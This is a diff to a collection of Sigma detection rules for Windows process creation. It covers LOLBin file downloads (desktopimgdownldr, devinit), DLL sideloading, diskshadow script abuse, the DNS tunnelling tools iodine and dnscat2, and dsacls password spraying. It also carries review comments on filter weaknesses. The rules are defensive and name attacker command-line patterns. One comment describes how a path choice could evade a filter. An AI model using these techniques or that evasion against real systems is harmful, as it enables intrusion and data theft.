@@ -44,7 +43,7 @@ detection: - C:\ProgramData\ - C:\Windows\Temp\ selection_susp_extensions: - CommandLine|endswith: + CommandLine|endswith: - .dll - .gif - .jpeg @@ -56,14 +55,15 @@ detection: - .vbe - .vbs filter_optional_git_windows: - CommandLine|contains|all: + # Example FP + # CommandLine: "C:\Program Files\Git\mingw64\bin\curl.exe" --silent --show-error --output C:/Users/test/AppData/Local/Temp/gfw-httpget-jVOEoxbS.txt --write-out %{http_code} https://gitforwindows.org/latest-tag.txt + CommandLine|contains|all: - '--silent --show-error --output ' - gfw-httpget- - AppData ParentProcessName: C:\Program Files\Git\usr\bin\sh.exe - NewProcessName: C:\Program Files\Git\mingw64\bin\curl.exe - condition: process_creation and (selection_curl and 1 of selection_susp_* and - not 1 of filter_optional_*) + NewProcessName: C:\Program Files\Git\mingw64\bin\curl.exe + condition: process_creation and (selection_curl and 1 of selection_susp_* and not 1 of filter_optional_*) falsepositives: - Unknown level: high diff --git a/sigma/builtin/process_creation/proc_creation_win_desktopimgdownldr_remote_file_download.yml b/sigma/builtin/process_creation/proc_creation_win_desktopimgdownldr_remote_file_download.yml index 779041ba6..67a987925 100644 --- a/sigma/builtin/process_creation/proc_creation_win_desktopimgdownldr_remote_file_download.yml +++ b/sigma/builtin/process_creation/proc_creation_win_desktopimgdownldr_remote_file_download.yml 
@@ -1,9 +1,7 @@ title: Remote File Download Via Desktopimgdownldr Utility id: 214641c2-c579-4ecb-8427-0cf19df6842e status: test -description: Detects the desktopimgdownldr utility being used to download a remote - file. An adversary may use desktopimgdownldr to download arbitrary files as an - alternative to certutil. +description: Detects the desktopimgdownldr utility being used to download a remote file. An adversary may use desktopimgdownldr to download arbitrary files as an alternative to certutil. references: - https://www.elastic.co/guide/en/security/current/remote-file-download-via-desktopimgdownldr-utility.html author: Tim Rauch @@ -19,8 +17,8 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: /lockscreenurl:http - NewProcessName|endswith: \desktopimgdownldr.exe + CommandLine|contains: /lockscreenurl:http + NewProcessName|endswith: \desktopimgdownldr.exe ParentProcessName|endswith: \desktopimgdownldr.exe condition: process_creation and selection falsepositives: diff --git a/sigma/builtin/process_creation/proc_creation_win_desktopimgdownldr_susp_execution.yml b/sigma/builtin/process_creation/proc_creation_win_desktopimgdownldr_susp_execution.yml index 97621f8ea..4afacee48 100644 --- a/sigma/builtin/process_creation/proc_creation_win_desktopimgdownldr_susp_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_desktopimgdownldr_susp_execution.yml @@ -1,8 +1,7 @@ title: Suspicious Desktopimgdownldr Command id: bb58aa4a-b80b-415a-a2c0-2f65a4c81009 status: test -description: Detects a suspicious Microsoft desktopimgdownldr execution with parameters - used to download files from the Internet +description: Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet references: - https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/ - https://twitter.com/SBousseaden/status/1278977301745741825 
@@ -20,14 +19,14 @@ detection: EventID: 4688 Channel: Security selection1: - CommandLine|contains: ' /lockscreenurl:' + CommandLine|contains: ' /lockscreenurl:' selection1_filter: - CommandLine|contains: + CommandLine|contains: - .jpg - .jpeg - .png selection_reg: - CommandLine|contains|all: + CommandLine|contains|all: - reg delete - \PersonalizationCSP condition: process_creation and (( selection1 and not selection1_filter ) or selection_reg) @@ -35,7 +34,6 @@ fields: - CommandLine - ParentCommandLine falsepositives: - - False positives depend on scripts and administrative tools used in the monitored - environment + - False positives depend on scripts and administrative tools used in the monitored environment level: high ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_deviceenroller_dll_sideloading.yml b/sigma/builtin/process_creation/proc_creation_win_deviceenroller_dll_sideloading.yml index ae77f9ab8..42f9ea3cf 100644 --- a/sigma/builtin/process_creation/proc_creation_win_deviceenroller_dll_sideloading.yml +++ b/sigma/builtin/process_creation/proc_creation_win_deviceenroller_dll_sideloading.yml 
@@ -1,16 +1,12 @@ title: Potential DLL Sideloading Via DeviceEnroller.EXE id: e173ad47-4388-4012-ae62-bd13f71c18a8 related: - - id: ee4c5d06-3abc-48cc-8885-77f1c20f4451 - type: similar + - id: ee4c5d06-3abc-48cc-8885-77f1c20f4451 + type: similar status: test -description: 'Detects the use of the PhoneDeepLink parameter to potentially sideload - a DLL file that does not exist. This non-existent DLL file is named "ShellChromeAPI.dll". - - Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe - using this parameter - - ' +description: | + Detects the use of the PhoneDeepLink parameter to potentially sideload a DLL file that does not exist. This non-existent DLL file is named "ShellChromeAPI.dll". + Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter references: - https://mobile.twitter.com/0gtweet/status/1564131230941122561 - https://strontic.github.io/xcyclopedia/library/DeviceEnroller.exe-24BEF0D6B0ECED36BB41831759FDE18D.html @@ -28,10 +24,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \deviceenroller.exe - - OriginalFileName: deviceenroller.exe + - NewProcessName|endswith: \deviceenroller.exe + - OriginalFileName: deviceenroller.exe selection_cli: - CommandLine|contains: /PhoneDeepLink + CommandLine|contains: /PhoneDeepLink condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_devinit_lolbin_usage.yml b/sigma/builtin/process_creation/proc_creation_win_devinit_lolbin_usage.yml index 6973c3d95..37d8523ed 100644 --- a/sigma/builtin/process_creation/proc_creation_win_devinit_lolbin_usage.yml +++ b/sigma/builtin/process_creation/proc_creation_win_devinit_lolbin_usage.yml 
@@ -1,9 +1,7 @@ title: Arbitrary MSI Download Via Devinit.EXE id: 90d50722-0483-4065-8e35-57efaadd354d status: test -description: Detects a certain command line flag combination used by "devinit.exe", - which can be abused as a LOLBIN to download arbitrary MSI packages on a Windows - system +description: Detects a certain command line flag combination used by "devinit.exe", which can be abused as a LOLBIN to download arbitrary MSI packages on a Windows system references: - https://twitter.com/mrd0x/status/1460815932402679809 - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Devinit/ @@ -22,7 +20,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - ' -t msi-install ' - ' -i http' condition: process_creation and selection diff --git a/sigma/builtin/process_creation/proc_creation_win_dfsvc_suspicious_child_processes.yml b/sigma/builtin/process_creation/proc_creation_win_dfsvc_suspicious_child_processes.yml index 13cb7ffc9..39ef54c42 100644 --- a/sigma/builtin/process_creation/proc_creation_win_dfsvc_suspicious_child_processes.yml +++ b/sigma/builtin/process_creation/proc_creation_win_dfsvc_suspicious_child_processes.yml @@ -1,8 +1,7 @@ title: Potentially Suspicious Child Process Of ClickOnce Application id: 67bc0e75-c0a9-4cfc-8754-84a505b63c04 status: experimental -description: Detects potentially suspicious child processes of a ClickOnce deployment - application +description: Detects potentially suspicious child processes of a ClickOnce deployment application references: - https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5 author: Nasreddine Bencherchali (Nextron Systems) @@ -19,7 +18,8 @@ detection: Channel: Security selection: ParentProcessName|contains: \AppData\Local\Apps\2.0\ - NewProcessName|endswith: + NewProcessName|endswith: + # Add more suspicious processes - \calc.exe - \cmd.exe - \cscript.exe 
diff --git a/sigma/builtin/process_creation/proc_creation_win_dirlister_execution.yml b/sigma/builtin/process_creation/proc_creation_win_dirlister_execution.yml index f3083a42a..19b8c9ccc 100644 --- a/sigma/builtin/process_creation/proc_creation_win_dirlister_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_dirlister_execution.yml @@ -1,9 +1,7 @@ title: DirLister Execution id: b4dc61f5-6cce-468e-a608-b48b469feaa2 status: test -description: Detect the usage of "DirLister.exe" a utility for quickly listing folder - or drive contents. It was seen used by BlackCat ransomware to create a list of - accessible directories and files. +description: Detect the usage of "DirLister.exe" a utility for quickly listing folder or drive contents. It was seen used by BlackCat ransomware to create a list of accessible directories and files. references: - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1083/T1083.md - https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/ @@ -21,8 +19,8 @@ detection: EventID: 4688 Channel: Security selection: - - OriginalFileName: DirLister.exe - - NewProcessName|endswith: \dirlister.exe + - OriginalFileName: DirLister.exe + - NewProcessName|endswith: \dirlister.exe condition: process_creation and selection falsepositives: - Legitimate use by users diff --git a/sigma/builtin/process_creation/proc_creation_win_diskshadow_child_process_susp.yml b/sigma/builtin/process_creation/proc_creation_win_diskshadow_child_process_susp.yml index 37cd1b985..f19910729 100644 --- a/sigma/builtin/process_creation/proc_creation_win_diskshadow_child_process_susp.yml +++ b/sigma/builtin/process_creation/proc_creation_win_diskshadow_child_process_susp.yml 
@@ -1,18 +1,16 @@ title: Potentially Suspicious Child Process Of DiskShadow.EXE id: 9f546b25-5f12-4c8d-8532-5893dcb1e4b8 related: - - id: fa1a7e52-3d02-435b-81b8-00da14dd66c1 - type: similar - - id: 1dde5376-a648-492e-9e54-4241dd9b0c7f - type: similar - - id: 56b1dde8-b274-435f-a73a-fb75eb81262a - type: similar - - id: 0c2f8629-7129-4a8a-9897-7e0768f13ff2 - type: similar + - id: fa1a7e52-3d02-435b-81b8-00da14dd66c1 # Diskshadow Script Mode - Execution From Potential Suspicious Location + type: similar + - id: 1dde5376-a648-492e-9e54-4241dd9b0c7f # Diskshadow Script Mode - Uncommon Script Extension Execution + type: similar + - id: 56b1dde8-b274-435f-a73a-fb75eb81262a # Diskshadow Child Process Spawned + type: similar + - id: 0c2f8629-7129-4a8a-9897-7e0768f13ff2 # Diskshadow Script Mode Execution + type: similar status: experimental -description: Detects potentially suspicious child processes of "Diskshadow.exe". This - could be an attempt to bypass parent/child relationship detection or application - whitelisting rules. +description: Detects potentially suspicious child processes of "Diskshadow.exe". This could be an attempt to bypass parent/child relationship detection or application whitelisting rules. references: - https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/ - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration @@ -35,7 +33,8 @@ detection: Channel: Security selection: ParentProcessName|endswith: \diskshadow.exe - NewProcessName|endswith: + NewProcessName|endswith: + # Note: add or remove additional binaries according to your org needs - \certutil.exe - \cscript.exe - \mshta.exe 
@@ -46,7 +45,6 @@ detection: - \wscript.exe condition: process_creation and selection falsepositives: - - False postitve can occur in cases where admin scripts levreage the "exec" flag - to execute applications + - False postitve can occur in cases where admin scripts levreage the "exec" flag to execute applications level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_diskshadow_script_mode_susp_ext.yml b/sigma/builtin/process_creation/proc_creation_win_diskshadow_script_mode_susp_ext.yml index b6f26f3d5..af72803fc 100644 --- a/sigma/builtin/process_creation/proc_creation_win_diskshadow_script_mode_susp_ext.yml +++ b/sigma/builtin/process_creation/proc_creation_win_diskshadow_script_mode_susp_ext.yml 
@@ -1,21 +1,18 @@ title: Diskshadow Script Mode - Uncommon Script Extension Execution id: 1dde5376-a648-492e-9e54-4241dd9b0c7f related: - - id: fa1a7e52-3d02-435b-81b8-00da14dd66c1 - type: similar - - id: 9f546b25-5f12-4c8d-8532-5893dcb1e4b8 - type: similar - - id: 56b1dde8-b274-435f-a73a-fb75eb81262a - type: similar - - id: 0c2f8629-7129-4a8a-9897-7e0768f13ff2 - type: similar + - id: fa1a7e52-3d02-435b-81b8-00da14dd66c1 # Diskshadow Script Mode - Execution From Potential Suspicious Location + type: similar + - id: 9f546b25-5f12-4c8d-8532-5893dcb1e4b8 # Potentially Suspicious Child Process Of DiskShadow.EXE + type: similar + - id: 56b1dde8-b274-435f-a73a-fb75eb81262a # Diskshadow Child Process Spawned + type: similar + - id: 0c2f8629-7129-4a8a-9897-7e0768f13ff2 # Diskshadow Script Mode Execution + type: similar status: experimental -description: 'Detects execution of "Diskshadow.exe" in script mode to execute an script - with a potentially uncommon extension. - +description: | + Detects execution of "Diskshadow.exe" in script mode to execute an script with a potentially uncommon extension. Initial baselining of the allowed extension list is required. - - ' references: - https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/ - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration 
@@ -37,17 +34,18 @@ detection: EventID: 4688 Channel: Security selection_img: - - OriginalFileName: diskshadow.exe - - NewProcessName|endswith: \diskshadow.exe + - OriginalFileName: diskshadow.exe + - NewProcessName|endswith: \diskshadow.exe selection_flag: - CommandLine|contains: + CommandLine|contains: - '/s ' - '-s ' filter_main_ext: - CommandLine|contains: .txt + # Note: can be changed to an "endswith" to avoid rare FPs. But you need to account for quoted paths + # Note: Using the ".txt" is based on the MS documentation example. Best add the extension you use internally before using this rule + CommandLine|contains: .txt condition: process_creation and (all of selection_* and not 1 of filter_main_*) falsepositives: - - False postitve might occur with legitimate or uncommon extensions used internally. - Initial baseline is required. + - False postitve might occur with legitimate or uncommon extensions used internally. Initial baseline is required. level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_diskshadow_script_mode_susp_location.yml b/sigma/builtin/process_creation/proc_creation_win_diskshadow_script_mode_susp_location.yml index abf69af4e..08ded7806 100644 --- a/sigma/builtin/process_creation/proc_creation_win_diskshadow_script_mode_susp_location.yml +++ b/sigma/builtin/process_creation/proc_creation_win_diskshadow_script_mode_susp_location.yml 
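Review bot: `filter_main_ext` still uses `CommandLine|contains: .txt`, so any command line that has `.txt` anywhere in it — a directory named `C:\scripts.txt\` or a script called `backup.txt.dsh` — is excluded, which lets an operator silence the rule by choice of path. The new comment already hints at `endswith`; I would make that the default and carry the quoted form, i.e. `CommandLine|endswith:` with the two entries `- .txt` and `- '.txt"'`, and keep the baselining note for locally used extensions. The `contains` form should then only be kept where the quoted-path caveat is deliberately accepted. The rule's `logsource` and references are outside this hunk.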
@@ -1,17 +1,16 @@ title: Diskshadow Script Mode - Execution From Potential Suspicious Location id: fa1a7e52-3d02-435b-81b8-00da14dd66c1 related: - - id: 1dde5376-a648-492e-9e54-4241dd9b0c7f - type: similar - - id: 9f546b25-5f12-4c8d-8532-5893dcb1e4b8 - type: similar - - id: 56b1dde8-b274-435f-a73a-fb75eb81262a - type: similar - - id: 0c2f8629-7129-4a8a-9897-7e0768f13ff2 - type: similar + - id: 1dde5376-a648-492e-9e54-4241dd9b0c7f # Diskshadow Script Mode - Uncommon Script Extension Execution + type: similar + - id: 9f546b25-5f12-4c8d-8532-5893dcb1e4b8 # Potentially Suspicious Child Process Of DiskShadow.EXE + type: similar + - id: 56b1dde8-b274-435f-a73a-fb75eb81262a # Diskshadow Child Process Spawned + type: similar + - id: 0c2f8629-7129-4a8a-9897-7e0768f13ff2 # Diskshadow Script Mode Execution + type: similar status: experimental -description: Detects execution of "Diskshadow.exe" in script mode using the "/s" flag - where the script is located in a potentially suspicious location. +description: Detects execution of "Diskshadow.exe" in script mode using the "/s" flag where the script is located in a potentially suspicious location. references: - https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/ - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration @@ -33,14 +32,15 @@ detection: EventID: 4688 Channel: Security selection_img: - - OriginalFileName: diskshadow.exe - - NewProcessName|endswith: \diskshadow.exe + - OriginalFileName: diskshadow.exe + - NewProcessName|endswith: \diskshadow.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - '/s ' - '-s ' selection_paths: - CommandLine|contains: + CommandLine|contains: + # Note: Add additional susp paths based on your org needs - :\Temp\ - :\Windows\Temp\ - \AppData\Local\ 
@@ -49,7 +49,6 @@ detection: - \Users\Public\ condition: process_creation and (all of selection_*) falsepositives: - - False positives may occur if you execute the script from one of the paths mentioned - in the rule. Apply additional filters that fits your org needs. + - False positives may occur if you execute the script from one of the paths mentioned in the rule. Apply additional filters that fits your org needs. level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_dll_sideload_vmware_xfer.yml b/sigma/builtin/process_creation/proc_creation_win_dll_sideload_vmware_xfer.yml index 53e987432..6369437d4 100644 --- a/sigma/builtin/process_creation/proc_creation_win_dll_sideload_vmware_xfer.yml +++ b/sigma/builtin/process_creation/proc_creation_win_dll_sideload_vmware_xfer.yml @@ -1,8 +1,7 @@ title: DLL Sideloading by VMware Xfer Utility id: ebea773c-a8f1-42ad-a856-00cb221966e8 status: test -description: Detects execution of VMware Xfer utility (VMwareXferlogs.exe) from the - non-default directory which may be an attempt to sideload arbitrary DLL +description: Detects execution of VMware Xfer utility (VMwareXferlogs.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL references: - https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/ author: Nasreddine Bencherchali (Nextron Systems) @@ -18,9 +17,9 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|endswith: \VMwareXferlogs.exe - filter: - NewProcessName|startswith: C:\Program Files\VMware\ + NewProcessName|endswith: \VMwareXferlogs.exe + filter: # VMware might be installed in another path so update the rule accordingly + NewProcessName|startswith: C:\Program Files\VMware\ condition: process_creation and (selection and not filter) falsepositives: - Unlikely 
diff --git a/sigma/builtin/process_creation/proc_creation_win_dllhost_no_cli_execution.yml b/sigma/builtin/process_creation/proc_creation_win_dllhost_no_cli_execution.yml index 756bdf580..00f53b185 100644 --- a/sigma/builtin/process_creation/proc_creation_win_dllhost_no_cli_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_dllhost_no_cli_execution.yml @@ -1,9 +1,7 @@ title: Dllhost.EXE Execution Anomaly id: e7888eb1-13b0-4616-bd99-4bc0c2b054b9 status: experimental -description: Detects a "dllhost" process spawning with no commandline arguments which - is very rare to happen and could indicate process injection activity or malware - mimicking similar system processes. +description: Detects a "dllhost" process spawning with no commandline arguments which is very rare to happen and could indicate process injection activity or malware mimicking similar system processes. references: - https://redcanary.com/blog/child-processes/ - https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08 @@ -22,12 +20,12 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine: + CommandLine: - dllhost.exe - dllhost - NewProcessName|endswith: \dllhost.exe + NewProcessName|endswith: \dllhost.exe filter_main_null: - CommandLine: null + CommandLine: condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: - Unlikely diff --git a/sigma/builtin/process_creation/proc_creation_win_dns_exfiltration_tools_execution.yml b/sigma/builtin/process_creation/proc_creation_win_dns_exfiltration_tools_execution.yml index 51579d9e2..8156b91ab 100644 --- a/sigma/builtin/process_creation/proc_creation_win_dns_exfiltration_tools_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_dns_exfiltration_tools_execution.yml 
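Review bot: `filter_main_null` changed from `CommandLine: null` to a bare `CommandLine:`; YAML parses an empty value as null, so the semantics are the same, but the explicit form was clearer and this filter depends on it — it exists to drop 4688 events whose CommandLine field is absent, for instance when command-line auditing is not enabled, which would otherwise turn every dllhost start into a hit. I would keep the explicit `CommandLine: null`, or at least add `# Exclude events without a CommandLine field (e.g. command line auditing disabled)` so the intent survives the next reformatting pass. The rest of the rule is a whitespace change.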
@@ -19,8 +19,8 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: \iodine.exe - - NewProcessName|contains: \dnscat2 + - NewProcessName|endswith: \iodine.exe + - NewProcessName|contains: \dnscat2 condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/builtin/process_creation/proc_creation_win_dns_susp_child_process.yml b/sigma/builtin/process_creation/proc_creation_win_dns_susp_child_process.yml index 862386628..baedb09a2 100644 --- a/sigma/builtin/process_creation/proc_creation_win_dns_susp_child_process.yml +++ b/sigma/builtin/process_creation/proc_creation_win_dns_susp_child_process.yml @@ -1,9 +1,7 @@ title: Unusual Child Process of dns.exe id: a4e3d776-f12e-42c2-8510-9e6ed1f43ec3 status: test -description: Detects an unexpected process spawning from dns.exe which may indicate - activity related to remote code execution or other forms of exploitation as seen - in CVE-2020-1350 (SigRed) +description: Detects an unexpected process spawning from dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed) references: - https://www.elastic.co/guide/en/security/current/unusual-child-process-of-dns.exe.html author: Tim Rauch @@ -22,7 +20,7 @@ detection: selection: ParentProcessName|endswith: \dns.exe filter: - NewProcessName|endswith: \conhost.exe + NewProcessName|endswith: \conhost.exe condition: process_creation and (selection and not filter) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_dnscmd_discovery.yml b/sigma/builtin/process_creation/proc_creation_win_dnscmd_discovery.yml index b3465f977..f87e4b024 100644 --- a/sigma/builtin/process_creation/proc_creation_win_dnscmd_discovery.yml +++ b/sigma/builtin/process_creation/proc_creation_win_dnscmd_discovery.yml 
@@ -1,8 +1,7 @@ title: Potential Discovery Activity Via Dnscmd.EXE id: b6457d63-d2a2-4e29-859d-4e7affc153d1 status: test -description: Detects an attempt to leverage dnscmd.exe to enumerate the DNS zones - of a domain. DNS zones used to host the DNS records for a particular domain. +description: Detects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain. DNS zones used to host the DNS records for a particular domain. references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/dnscmd - https://docs.microsoft.com/en-us/azure/dns/dns-zones-records @@ -22,9 +21,9 @@ detection: EventID: 4688 Channel: Security selection_img: - NewProcessName|endswith: \dnscmd.exe + NewProcessName|endswith: \dnscmd.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - /enumrecords - /enumzones - /ZonePrint diff --git a/sigma/builtin/process_creation/proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml b/sigma/builtin/process_creation/proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml index 10b6e8221..9d2410d85 100644 --- a/sigma/builtin/process_creation/proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml +++ b/sigma/builtin/process_creation/proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml 
@@ -1,14 +1,12 @@ title: New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE id: f63b56ee-3f79-4b8a-97fb-5c48007e8573 related: - - id: e61e8a88-59a9-451c-874e-70fcc9740d67 - type: derived - - id: cbe51394-cd93-4473-b555-edf0144952d9 - type: derived + - id: e61e8a88-59a9-451c-874e-70fcc9740d67 + type: derived + - id: cbe51394-cd93-4473-b555-edf0144952d9 + type: derived status: test -description: Detects the installation of a DNS plugin DLL via ServerLevelPluginDll - parameter in registry, which can be used to execute code in context of the DNS - server (restart required) +description: Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required) references: - https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83 - https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html @@ -27,10 +25,10 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - /config - /serverlevelplugindll - NewProcessName|endswith: \dnscmd.exe + NewProcessName|endswith: \dnscmd.exe condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_dotnet_trace_lolbin_execution.yml b/sigma/builtin/process_creation/proc_creation_win_dotnet_trace_lolbin_execution.yml index 51f695586..9c0c67164 100644 --- a/sigma/builtin/process_creation/proc_creation_win_dotnet_trace_lolbin_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_dotnet_trace_lolbin_execution.yml 
@@ -18,10 +18,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \dotnet-trace.exe - - OriginalFileName: dotnet-trace.dll + - NewProcessName|endswith: \dotnet-trace.exe + - OriginalFileName: dotnet-trace.dll selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - '-- ' - collect condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_driverquery_recon.yml b/sigma/builtin/process_creation/proc_creation_win_driverquery_recon.yml index 5b0fb1eac..d7bbe3fd8 100644 --- a/sigma/builtin/process_creation/proc_creation_win_driverquery_recon.yml +++ b/sigma/builtin/process_creation/proc_creation_win_driverquery_recon.yml @@ -1,11 +1,10 @@ title: Potential Recon Activity Using DriverQuery.EXE id: 9fc3072c-dc8f-4bf7-b231-18950000fadd related: - - id: a20def93-0709-4eae-9bd2-31206e21e6b2 - type: similar + - id: a20def93-0709-4eae-9bd2-31206e21e6b2 + type: similar status: experimental -description: Detect usage of the "driverquery" utility to perform reconnaissance on - installed drivers +description: Detect usage of the "driverquery" utility to perform reconnaissance on installed drivers references: - https://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/ - https://www.vmray.com/cyber-security-blog/analyzing-ursnif-behavior-malware-sandbox/ 
@@ -23,19 +22,19 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: driverquery.exe - - OriginalFileName: drvqry.exe + - NewProcessName|endswith: driverquery.exe + - OriginalFileName: drvqry.exe selection_parent: - - ParentProcessName|endswith: - - \cscript.exe - - \mshta.exe - - \regsvr32.exe - - \rundll32.exe - - \wscript.exe - - ParentProcessName|contains: - - \AppData\Local\ - - \Users\Public\ - - \Windows\Temp\ + - ParentProcessName|endswith: + - \cscript.exe + - \mshta.exe + - \regsvr32.exe + - \rundll32.exe + - \wscript.exe + - ParentProcessName|contains: + - \AppData\Local\ + - \Users\Public\ + - \Windows\Temp\ condition: process_creation and (all of selection_*) falsepositives: - Legitimate usage by some scripts might trigger this as well diff --git a/sigma/builtin/process_creation/proc_creation_win_driverquery_usage.yml b/sigma/builtin/process_creation/proc_creation_win_driverquery_usage.yml index 0c32c1ffc..7ca6a06ad 100644 --- a/sigma/builtin/process_creation/proc_creation_win_driverquery_usage.yml +++ b/sigma/builtin/process_creation/proc_creation_win_driverquery_usage.yml @@ -1,11 +1,10 @@ title: DriverQuery.EXE Execution id: a20def93-0709-4eae-9bd2-31206e21e6b2 related: - - id: 9fc3072c-dc8f-4bf7-b231-18950000fadd - type: similar + - id: 9fc3072c-dc8f-4bf7-b231-18950000fadd + type: similar status: experimental -description: Detect usage of the "driverquery" utility. Which can be used to perform - reconnaissance on installed drivers +description: Detect usage of the "driverquery" utility. Which can be used to perform reconnaissance on installed drivers references: - https://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/ - https://www.vmray.com/cyber-security-blog/analyzing-ursnif-behavior-malware-sandbox/ 
@@ -23,21 +22,21 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: driverquery.exe - - OriginalFileName: drvqry.exe - filter_main_other: - - ParentProcessName|endswith: - - \cscript.exe - - \mshta.exe - - \regsvr32.exe - - \rundll32.exe - - \wscript.exe - - ParentProcessName|contains: - - \AppData\Local\ - - \Users\Public\ - - \Windows\Temp\ + - NewProcessName|endswith: driverquery.exe + - OriginalFileName: drvqry.exe + filter_main_other: # These are covered in 9fc3072c-dc8f-4bf7-b231-18950000fadd to avoid duplicate alerting + - ParentProcessName|endswith: + - \cscript.exe + - \mshta.exe + - \regsvr32.exe + - \rundll32.exe + - \wscript.exe + - ParentProcessName|contains: + - \AppData\Local\ + - \Users\Public\ + - \Windows\Temp\ condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: - Legitimate use by third party tools in order to investigate installed drivers -level: medium +level: medium # Level could be reduced to low if this utility is often used in your environment ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_dsacls_abuse_permissions.yml b/sigma/builtin/process_creation/proc_creation_win_dsacls_abuse_permissions.yml index a764f0ff0..77bd7d82a 100644 --- a/sigma/builtin/process_creation/proc_creation_win_dsacls_abuse_permissions.yml +++ b/sigma/builtin/process_creation/proc_creation_win_dsacls_abuse_permissions.yml @@ -19,12 +19,12 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \dsacls.exe - - OriginalFileName: DSACLS.EXE + - NewProcessName|endswith: \dsacls.exe + - OriginalFileName: DSACLS.EXE selection_flag: - CommandLine|contains: ' /G ' + CommandLine|contains: ' /G ' selection_permissions: - CommandLine|contains: + CommandLine|contains: # Add more permissions as you see fit in your environment - GR - GE - GW 
diff --git a/sigma/builtin/process_creation/proc_creation_win_dsacls_password_spray.yml b/sigma/builtin/process_creation/proc_creation_win_dsacls_password_spray.yml index a1750cf4b..db2ba12a1 100644 --- a/sigma/builtin/process_creation/proc_creation_win_dsacls_password_spray.yml +++ b/sigma/builtin/process_creation/proc_creation_win_dsacls_password_spray.yml @@ -20,10 +20,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \dsacls.exe - - OriginalFileName: DSACLS.EXE + - NewProcessName|endswith: \dsacls.exe + - OriginalFileName: DSACLS.EXE selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - '/user:' - '/passwd:' condition: process_creation and (all of selection*) diff --git a/sigma/builtin/process_creation/proc_creation_win_dsim_remove.yml b/sigma/builtin/process_creation/proc_creation_win_dsim_remove.yml index 201bfe892..e35db3dd7 100644 --- a/sigma/builtin/process_creation/proc_creation_win_dsim_remove.yml +++ b/sigma/builtin/process_creation/proc_creation_win_dsim_remove.yml @@ -1,8 +1,7 @@ title: Dism Remove Online Package id: 43e32da2-fdd0-4156-90de-50dfd62636f9 status: test -description: Deployment Image Servicing and Management tool. DISM is used to enumerate, - install, uninstall, configure, and update features and packages in Windows images +description: Deployment Image Servicing and Management tool. DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images references: - 